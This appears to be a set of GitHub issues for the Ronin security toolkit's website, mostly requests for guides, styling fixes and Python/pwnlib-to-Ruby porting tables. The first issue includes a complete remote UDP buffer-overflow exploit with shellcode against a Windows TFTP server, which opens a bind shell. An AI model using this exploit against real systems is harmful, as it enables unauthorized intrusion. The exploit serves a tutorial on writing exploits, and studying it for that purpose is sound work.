Add a tutorial detailing how to write exploits using ronin-exploits.

• Use an existing exploit from www.exploit-db.com (http://www.exploit-db.com/exploits/5314/)
• Generate a skeleton exploit.
• Convert the logic over.

#!/usr/bin/ronin-exploit -f

require 'ronin/exploit/remote_udp'

Ronin::Exploits::RemoteUDP.object do
 
  cache do
    self.description = "TFTP Server for Windows V1.4 ST (0day)"
    self.url = "http://www.offensive-security.com"
  end
 
  parameter :host, :default => '172.16.167.134'

  parameter :port, :default => 69
 
  build do
    # Jump back shellcode
    sc = "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16\x91\x9c"
    sc += "\x30\x83\xeb\xfc\xe2\xf4\xcf\x7f\x45\x44\x32\x65\xc5\xb0\xd7\x9b"
    sc += "\x0c\xce\xdb\x6f\x51\xcf\xf7\x91\x9c\x30"

    filename = ("\x90" * 860)   +
               @encoded_payload +
               ("\x90" * 14)    +
               "#{sc}\xeb\xd0\x90\x90\x2b\x0e\x41"

    mode = "netascii"

    @exploit = "\x00\x02" + filename + "\0" + mode + "\0"
  end

  deploy do
    print_info "Sending evil packet, ph33r"

    udp_send @exploit

    print_info "Connecting to bind shell"
  end

end

Add a small LinkedIn SVG icon and a link for sharing the blog post on linkedin. Link to https://www.linkedin.com/sharing/share-offsite/?url={{ page.url | uri_escape }} to allow sharing the blog post URL to LinkedIn.

Replace **Note:** with Bulma messages.

Record using the new and improved ronin console using asciinema.

Add a guide to /docs/ on how to setup a Ruby development environment.

• Recommend using the ronin-dev.sh script.
• Include manually instructions on how to install ruby from the package manager:
  • Mention the differences between ruby, ruby-dev, and ruby-full.
  • Also mention that one must install libyaml-dev on Ubuntu in order for the psych gem to be compiled by bundle install.
• Cover chruby and ruby-install as a more advanced option.
• Also mention rbenv and ruby-build.

• devel/ruby-gems must be installed for the gem command.
• Also install pkg-config so the sqlite3 gem can compile.

Add a guide on how to write custom Ruby scripts using ronin-support.

Re-add the Contact page, for those that don't see the links in the footer.

On this blog post the really long pre > code element is somehow word wrapping, even though overflow-x: is set to auto. I also tried setting word-wrap: unset but that did not fix it.

Write a guide on how to port Metasploit payloads to ronin-payloads.

• Class definition.
• included modules.
• basic metadata.
• Handlers vs. Mixins::BindShell/Mixins::ReverseShell
• Sessions vs. PostEx Sessions
• options vs. params
• generate vs. validate, build, prelaunch, postlaunch, cleanup methods.
• Printing methods.
• Packing methods.

In ronin-rb.dev the version of some packages are not correct.

• ronin: 2.0.0 -> 2.0.1
• ronin-support: 1.0.0 -> 1.0.1
• ronin-core: 0.1.0 -> 0.1.1
• ronin-web-server: 0.1.0 -> 0.1.1
• ronin-payloads: 0.1.0 -> 0.1.1
• ronin-vulns: 0.1.1 -> 0.1.2
• ronin-exploits: 1.0.0 -> 1.0.1

I checked it by searching at rubygems

During page navigation there are multiple instances in which an error to the next or linked page arises as shown in the screenshot.

I would be sharing a pull request to mitigate the issue and make the website more efficient.

Write a guide on how to use the ronin-exploits command:

• ronin-exploits list
• ronin-exploits show
• ronin-exploits run
• ronin-exploits new

There should be a page that lists every tag used and the blog posts under the tag.

Write a guide on how to use the ronin-db command

• Migrate up the database (if necessary).
• Add another database.
• List databases.
• Remote a database.
• How to query different tables.
• How to add new data to various tables.
• How to delete data from the various tables.

Accept Bitcoin donations. Find a place to link to the Ronin bitcoin address.

Remove mentions of the Ronin Twitter account from the website. Also remove the Twitter icon from the front page and blog posts.

We need to setup a GitHub Actions CI task to check for broken or missing links.

https://clementbm.github.io/coding/2020/05/31/automatically-validate-links-on-jekyll-website.html

Switch the color scheme to white text on black / dark gray background. Example: https://runlet.app/

Add a guide to /docs/guides/ on how to use the ronin-db gem in Ruby scripts. Title of the guide TBD.

Now that ronin is in the NixOS nixpkgs repo there should be a /install/nixos/index.md page that's linked to from /install/index.md.

/cc @Ch1keen

Now that Ruby uses reline, the pure-Ruby libreadline clone, we can omit installing readline from the installation instructions.

ArchLinux has moved the community/ruby package into the extra repo, so pacman -Sy --noconfirm ruby works now.

Forgot to mention the Metasploit fail_with method vs. Ronin's fail method for raising errors from within an exploit.

Copy/paste the Ubuntu installation instructions for Kali Linux.

Add a porting guide which explains how to port common python code patterns to their ruby equivalents. Also mention various automated tools, such as py2rb.

• None -> nil
• True / False -> true / false
• f"... {}..." strings -> Ruby String interpolation (ex: "foo #{var} bar")
• "foo"+var+"bar" -> "foo#{var}bar"
• b"..." strings -> Ruby Strings. Mention "...".b and String.new("...", enocding: Encoding::BINARY)
• str(...) -> var.to_s or String(var)
• int(...) -> var.to_i or Integer(var)
• list -> [...]
• list[idx] -> array.fetch(idx) (mention that array[key] does not raise an exception for missing indexes).
• dict -> {a: 1, b: 2} or {1 => 2, 'a' => 'b'}
• dict[key] -> hash.fetch(key) (mention that hash[key] does not raise an exception for missing keys).
• {"foo", "bar", ...} -> Set["foo", "bar", ...]
• print(...) -> puts
• if var == 1: -> if var == 1 (mention "truthy-ness")
• if "pattern" in str: -> if str.include?(pattern)
• for x in list: -> list.each do |x| (mention and link to Enumerable docs).
• while True -> loop do ... end
• try: except: -> begin ... rescue (mention rescue StandardError, and that rescue Exception is not recommended).
• def foo(): -> def foo
• Python generators -> yield x and return enum_for(__method__,...) unless block_given?
• __iter__ / __next__ -> include Enumerable and def each and return enum_for unless block_given?.

CLI

• if __name__ == "__main__": -> if $0 == __FILE__
• sys.argv -> ARGV (mention that ARGV does not contain the command name, that's stored in $PROGRAM_NAME) (also mention ARGF)
• sys.exit -> exit
• os.environ -> ENV
• argparse.ArgumentParser -> OptionParser
• ANSI logging messages -> Ronin::Support::CLI::Printing

stdlib

• datetime.datetime.now() -> Time.now, Date.today, DateTime.now.
• datetime.datetime.timestamp(date) -> Time.parse, Date.parse, DateTime.parse.
• socket.socket(socket.AF_INET, socket.SOCK_STREAM) and s.connect((ip, port)) -> TCPSocket.new(host,port) (link to TCPSocket documentation).
• urllib -> URI

libraries

• requests -> Ronin::Support::Network::HTTP
• requests.Session() -> Ronin::Support::Network::HTTP.new(host,port)
• response.status_code -> response.code
• BeautifulSoup -> Nokogiri::XML / Nokogiri::HTML

I suspect that the newly redesigned website could be made more Accessible for those using screen readers.

Add a guide to /docs/dev/ on basic git usage:

• Cloning your fork of the repo.
• Creating a branch.
  • Mention upcoming version branches (ex X.Y.0 branches).
• Switching back to the previous branch.
• Adding an upstream repo.
• Fetching new commits from upstream.
• Rebasing your branch.

Write a basic guide on how to use the ronin-repos command what are Ronin repositories.

Now that the sqlite3 gem bundles a version of libsqlite3, it's no longer necessary to install.

Write a guide on how to use the ronin-vulns command:

• ronin-vulns lfi
• ronin-vulns open-redirect
• ronin-vulns xss
• ronin-vulns rfi
• ronin-vulns scan
• ronin-vulns sqli
• ronin-vulns ssti
• ronin-vulns scan (like the previous commands, but tests each URL for all web vulnerabilities).

Appears that by adding the "Donate" button/icon it overflowed the content. Also the heights of the buttons/icons are not aligned. Only occurs in when viewing the website on a mobile device or smaller screen resolution.

Under the "Class Definition" section, mention that the ronin-exploits new command can be used to generate a new skeleton exploit file, which can save some extra typing.

It is possible to install Ronin into the Android Termux environment.

pkg update -y
pkg upgrade -y -o Dpkg::Options::="--force-confnew"
pkg install -y binutils ruby clang make readline sqlite -o Dpkg::Options::="--force-confnew"
gem install ronin

Add Bulma CSS to the website and start using it's CSS rules. Example: https://github.com/postmodern/postmodern.github.io/

Add a Donate button to the front page, probably in the social media links under "Get Involved".

The cursor needs to turn to a pointer when hovering on the dark mode icon in the home page header.
Please review the changes. Thanks :)

Reference:

Add a guide on how to write a Ronin exploit.

• How to use ronin-exploits new to generate a skeleton exploit file.
• Exploit types / base classes.
• Basic metadata.
• Exploits targeting a specific Arch or OS.
• Exploits with multiple targets (Mixins::HasTargets).
• Exploits that take a payload (Mixins::HasPayload).
• build, launch, cleanup methods.
• printing methods.
• Mixins:
  • Mixins::Binary
  • Mixins::BuildDir
  • Mixins::FileBuilder
  • Mixins::Text
  • Mixins::NOPS
  • Mixins::StackOverflow
  • Mixins::FormatString
  • Mixins::SEH
  • Mixins::FileBuilder
  • Mixins::RemoteTCP / Mixins::RemoteUDP
  • Mixins:::HTTP
  • Mixins::HTML
  • Mixins::Loot
• Web Vuln Exploits:
  • LFI
  • OpenRedirect
  • RFI
  • SQLI
  • SSTI
  • XSS

Add a dark-mode toggle similar to the one on my blog (source). It should add a dark-mode CSS class to body which then activates the dark-mode CSS rules which change the --bg-color and --fg-color CSS global variables. It should invert the black and white color scheme.

Add custom print CSS rules to make the web pages print nicer. The top nav links should probably be hidden. The SVG images on the front page should also probably be hidden or resized to be smaller?

Add a link to the front page under "Get Involved" pointing to the Merch store with a shopping bag or t-shirt SVG icon.

Write a guide on how to use the ronin-payloads command:

• ronin-payloads list
• ronin-payloads show
• ronin-payloads build
• ronin-payloads new

Add a search box (somewhere) to the website that uses DuckDuckGo and searches the website.
https://duckduckgo.com/?q=site%3Aronin-rb.dev&t=h_&ia=web

Add a porting guide on how to convert pwnlib scripts into ronin ruby scripts. Try to find the ronin equivalents for the various pwnlib APIs. Show examples from ronin-support, ronin-code-asm, ronin-payloads, and ronin-exploits.

• pwnlib.tubes.Buffer -> Ronin::Support::Binary::Buffer
• pwnlib.tubes.process -> IO.popen
• pwnlib.tubes.remote -> tcp_connect, ssl_connect, tls_connect, udp_connect.
• pwnlib.tubes.server -> tcp_server, ssl_server, tls_server, udp_server.
• pwnlib.tubes.ssh -> net-ssh
• pwnlib.useragents -> Ronin::Support::Network::HTTP::UserAgents (also mention ronin-web-user_agents for generating random realistic User-Agent strings).
• pwnlib.timeout -> timeout.
• pwnlib.util.crc -> digest-crc.
• pwnlib.util.fiddling:
  • bits_str -> int.to_s(2)
  • b64d -> string.base64_decode
  • b64e -> string.base64_encode
  • enhex -> string.hex_encode
  • hexdump -> string.hexdump / File.hexdump / io.hexdump
  • hexdump_iter -> Hexdump::Hexdump#each_line?
  • isprint -> string.printable? / Chars::PRINTABLE =~ string
  • js_escape -> string.js_escape
  • js_unescape -> string.js_unescape
  • unhex -> string.hex_decode
  • urldecode -> string.uri_decode/string.uri_unescape`
  • urlencode -> string.uri_encode
  • xor -> string.xor(other_string)
• pwnlib.util.hashes:
  • md5filehex -> File.md5(path)
  • md5sumhex -> string.md5
  • sha1filehex -> File.sha1(path)
  • sha1sumhex -> string.sha1
  • sha256filehex -> File.sha256(path)
  • sha256sumhex -> string.sha256
  • sha512filehex -> File.sha512(path)
  • sha512sumhex -> string.sha512
• pwnlib.util.iters:
  • chained -> return enum_for(__method__,...) unless block_given?
  • consume -> ????
  • cycles -> array.cycle(n)
  • bruteforce -> Chars.alpha_numeric.strings_of_length(n).find { |str| ... }
  • flatten -> array.flatten
  • group -> array.each_slice(n)
  • iter_except -> array.each (this is how enumerators work by default).
  • lookahead -> enum.take(n)
  • nth -> ????
  • pad -> ????
  • pairwise -> enum.each_cons(2)
  • powerset -> require 'combinatorics/power_set' and array.power_set.
  • quantify -> enum.count { |i| ... }
  • random_combination -> array.combination(2).to_a.sample
  • random_permutation -> array.permutation.to_a.sample
  • random_product -> array1.product(array2).sample
  • repeat_func -> Array.new(n) { |i| func(obj) }
  • roundrobbin -> ????
  • tabulate -> (1..4).map { |i| ... } / (1..4).map(&method(:func))
  • take -> enum.take(n)
  • unique_everseen -> enum.uniq
  • unique_justseen -> ????
  • unique_window -> ????
• pwnlib.util.list:
  • concat -> array.concat
  • concat_all -> array.concat
  • findall -> ????
  • group -> each_slice(n)
  • ordlist -> string.bytes
  • partition -> ????
  • unordlist -> array.map(&:chr).join
• pwnlib.util.misc:
  • align -> ???? (maybe array.map with int.round?)
  • align_down -> ???? (maybe array.map with int.round?)
  • binary_ip -> IPAddr.new(ip).hton
  • mkdir_p -> FileUtils.mkdir_p
  • read -> File.binread(path) / File.read(path)
  • size -> ????
  • which -> ????
  • write -> File.binwrite / File.write
• pwnlib.util.packing
  • pack -> int.pack (but with a ctype symbol instead of endianness, wordsize, endianness)
  • p8 -> int.pack(:uint8) / int.chr
  • p16 -> int.pack(:uint16) / int.pack(:uint16_le) / int.pack(:uint16_be)
  • p32 -> int.pack(:uint32) / int.pack(:uint32_le) / int.pack(:uint32_be)
  • p64 -> int.pack(:uint64) / int.pack(:uint64_le) / int.pack(:uint64_be)
  • u8 -> string.unpack1(:uint8)
  • u16 -> string.unpack1(:uint16) / string.unpack1(:uint16_le) / string.unpack1(:uint16_be)
  • u32 -> string.unpack1(:uint32) / string.unpack1(:uint32_le) / string.unpack1(:uint32_be)
  • u64 -> string.unpack1(:uint64) / string.unpack1(:uint64_le) / string.unpack1(:uint64_be)
  • unpack -> string.unpack1 (but with a ctype symbol instead of endianness, wordsize, endianness)
  • unpack_many -> string.unpack (but with a [:uint, n] instead of endianness, wordsize, endianness)

Add a porting guide comparing/contrasting the differences between Metasploit exploits and Ronin exploits, with cheat sheets on how to translate various code.

For some reason only the lobste.rs icon is showing up below blog posts. This only seems to occur on https://ronin-rb.dev/blog/, but not locally.

Replace the Dev link with just a link to GitHub. There is now enough material on how to use Git and GitHub.

Render the blog post's tags list in the post layout (_layouts/post.html). Each tag should link to the tag on the tag cloud page, showing the other blog posts with that same tag.

Write a guide on how to write a Ronin payload from scratch.

• Use ronin-payloads new to generate a skeleton payload file.
• Types and base-classes for different payloads.
• Metadata
• params
• build, prelaunch, postlaunch methods
  • Note: you do not need to define prelaunch or postlaunch if you include Mixins::BindShell or Mixins::ReverseShell.
• Mixins:
  • Mixins::Binary
  • Mixins::BindShell
  • Mixins::BuildDir
  • Mixins::ERB
  • Mixins::Network
  • Mixins::PostEx
  • Mixins::ResolveHost
  • Mixins::ReverseShell
  • Mixins::Tempfile
  • Mixins::TypeScript

The man-pages from all of the gems should be hosted under /docs/ as HTML pages. This is difficult because they use a specialized form of markdown which is converted to roff (man-page's markup) by kramdown-man. Will need to either convert the raw roff output to HTML, or write a custom man-page Markdown -> HTML Kramdown Converter.